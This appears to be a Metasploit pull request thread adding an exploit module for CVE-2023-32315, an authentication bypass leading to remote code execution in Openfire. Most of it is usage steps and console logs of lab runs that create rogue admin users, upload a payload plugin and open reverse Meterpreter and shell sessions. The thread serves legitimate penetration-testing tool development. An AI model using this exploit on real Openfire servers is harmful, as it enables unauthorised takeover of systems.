Openfire Authentication Bypass RCE [CVE-2023-32315]

[h00die-gr3y]

Openfire authentication bypass with RCE plugin

Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack
via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users.
This module will use the vulnerability to create a new admin user that will be used to upload a Openfire management plugin weaponized with a Java native payload that triggers an RCE.
This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.
The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the first version on the 4.8 branch, which is version 4.8.0.

This module has been tested on:

• Ubuntu Linux 22.04.

• Openfire 3.10.1, 4.0.4, 4.1.0, 4.2.0, 4.3.0, 4.4.0, 4.5.0, 4.6.0. 4.7.0, 4.7.1, 4.7.3
• Java 7, 8, 17

• Windows Server 2019 Datacenter

• Openfire 4.7.3
• Java 20

Instructions for an Openfire installation:
Download Openfire releases here.
Follow installation instructions here.

Verification

• Start msfconsole
• exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
• set rhosts <ip-target>
• set rport <port>
• set target <0=Java Universal>
• exploit
• you should get a reverse shell or Meterpreter session depending on the payload and target settings

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > options

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host


Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal

Scenarios

Ubuntu 22.04 - Openfire 4.7.0 - java/meterpreter/reverse_tcp

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Openfire version is 4.7.0
[*] Grabbing the cookies.
[*] JSESSIONID=node010hllcuuhb19x13etracg8jjxk24.node0
[*] csrf=Lc9ZXFTo6H3bnC1
[*] Adding a new admin user.
[*] Logging in with admin user "jdajefap" and password "W3EozCK8Nx".
[*] Upload and execute plugin "U6zVD3dY" with payload "java/meterpreter/reverse_tcp".
[*] Sending stage (58851 bytes) to 192.168.201.59
[*] Meterpreter session 33 opened (192.168.201.10:4444 -> 192.168.201.59:60420) at 2023-07-08 10:33:16 +0000
[!] Plugin "U6zVD3dY" need manually clean-up via Openfire Admin console.
[!] Admin user "jdajefap" need manually clean-up via Openfire Admin console.

meterpreter > getuid
Server username: openfire
meterpreter > sysinfo
Computer        : cuckoo
OS              : Linux 5.15.0-76-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter >

Windows Server 2019 Datacenter - Openfire 4.7.3 - java/shell/reverse_tcp

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Openfire version is 4.7.4
[*] Grabbing the cookies.
[*] JSESSIONID=node01dr68xhv8giop14zogvh0ycnt13.node0
[*] csrf=mRz62R9hab6YAgt
[*] Adding a new admin user.
[*] Logging in with admin user "qkcvdmmevuvw" and password "tO0gWgDrM4".
[*] Upload and execute plugin "XZl3TKb1ayogynR" with payload "java/shell/reverse_tcp".
[*] Sending stage (2952 bytes) to 192.168.201.57
[!] Plugin "XZl3TKb1ayogynR" need manually clean-up via Openfire Admin console.
[!] Admin user "qkcvdmmevuvw" need manually clean-up via Openfire Admin console.
[*] Command shell session 32 opened (192.168.201.10:4444 -> 192.168.201.57:50171) at 2023-07-08 10:31:01 +0000


Shell Banner:
Microsoft Windows [Version 10.0.17763.107]
-----


C:\Program Files\Openfire\bin>systeminfo
systeminfo

Host Name:                 WIN-HHRQENPDSRS
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00430-00000-00000-AA500
Original Install Date:     1/23/2023, 4:51:06 AM
System Boot Time:          7/8/2023, 2:16:23 AM
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2306 Mhz
BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 728 MB
Virtual Memory: Max Size:  3,469 MB
Virtual Memory: Available: 1,523 MB
Virtual Memory: In Use:    1,946 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.201.1
                                 IP address(es)
                                 [01]: 192.168.201.57
                                 [02]: fe80::b089:6587:7273:231e
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\Program Files\Openfire\bin>

[bwatters-r7]

It loos like there's a compiled java plugin required for this exploit module; can you please provide the source and build instructions?

[h00die-gr3y]

@bwatters-r7, you should have the source already.
I am using the exact same logic used at the openfire auth bypass module that was submitted in 2008 at Metasploit.
See openfire_auth_bypass.rb
See data directory

[bwatters-r7]

For future travelers, here is the PR that brought in the plugin: #522
https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/CVE-2008-6508/Example.java

[bwatters-r7]

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > check

[*] {"version"=>"4.7.3"}
[+] 10.5.134.129:9090 - The target is vulnerable. Openfire version is 4.7.3

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > 
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {"version"=>"4.7.3"}
[+] The target is vulnerable. Openfire version is 4.7.3
[*] Grabbing the cookies.
[*] JSESSIONID=node01xtz5e23yrkac16v8y6phlgwv18.node0
[*] csrf=OOYpLh1QMPrkUEo
[*] Adding a new admin user.
[*] Logging in with admin user "nrrjgkhhtubhh" and password "6CtQBuQKk".
[*] Upload and execute plugin "hXdXFCjYXvHp" with payload "java/meterpreter/reverse_tcp".
[*] Sending stage (58851 bytes) to 10.5.134.129
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:54320) at 2023-07-12 15:46:08 -0500
[!] Plugin "hXdXFCjYXvHp" need manually clean-up via Openfire Admin console.
[!] Admin user "nrrjgkhhtubhh" need manually clean-up via Openfire Admin console.

meterpreter > sysinfo
Computer        : ubuntu2204x64
OS              : Linux 5.19.0-41-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > getuid
Server username: openfire
meterpreter > 

[bwatters-r7]

A suggestion for sharing the files better: h00die-gr3y#1

[bwatters-r7]

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Openfire version is 4.7.3
[*] Grabbing the cookies.
[*] JSESSIONID=node01odqjjp8uasbw1pnwewld8lgu81.node0
[*] csrf=KcWADPL8j2Q8LUB
[*] Adding a new admin user.
[*] Logging in with admin user "jlgkvghftyfl" and password "Eu0UcLO8".
[*] Upload and execute plugin "zxeKv0E7rwFk" with payload "java/meterpreter/reverse_tcp".
[*] Sending stage (58851 bytes) to 10.5.134.129
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:43500) at 2023-07-17 16:17:21 -0500
[!] Plugin "zxeKv0E7rwFk" need manually clean-up via Openfire Admin console.
[!] Admin user "jlgkvghftyfl" need manually clean-up via Openfire Admin console.

meterpreter > sysinfo
Computer        : ubuntu2204x64
OS              : Linux 5.19.0-46-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > 

[bwatters-r7]

Release Notes

This PR adds a module for CVE-2023-32315, a remote code execution vulnerability for all versions of Openfire that have been released since April 2015, starting with version 3.10.0. Patched versions are 4.7.5+ 4.6.8+ and 4.8.0+.